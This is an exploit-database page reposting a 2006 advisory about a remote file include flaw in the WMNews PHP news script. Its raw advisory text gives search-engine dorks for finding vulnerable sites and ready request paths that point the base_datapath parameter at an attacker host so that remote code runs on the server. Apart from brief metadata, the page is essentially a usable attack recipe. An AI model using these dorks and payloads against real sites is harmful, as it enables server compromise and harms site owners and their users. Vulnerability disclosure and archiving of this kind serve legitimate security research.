header-logo
Suggest Exploit
vendor:
WMNews
by:
uNfz
7,5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: WMNews
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

WMNews Remote File Include Vulnerability

A vulnerability in WMNews allows remote attackers to include arbitrary files via a URL in the base_datapath parameter to index.php.

Mitigation:

No mitigation or remediation available
Source

Exploit-DB raw data:

       Advisory: WMNews Remote File Include Vulnerability
 Release Date: 2006/07/26
         Author: uNfz
  Critical Level: High
        Contact: unfzbr@hotmail.com
         Vendor: Warta Mikael

--------------------
--------------------

Searching / Dork:

allinurl: *.php?Artid=*
allinurl: *.php?ArtCat=*
allinurl: wmprint.php
allinurl: wmview.php

--------------------

exploration:

/index.php?config=1&base_datapath=http://[evilhost]
/[dir]/index.php?config=1&base_datapath=http://[evilhost]

--------------------

uNfz
irc.efnet.org

# milw0rm.com [2006-07-27]

Navigation

Suggest Exploit

Services By CQR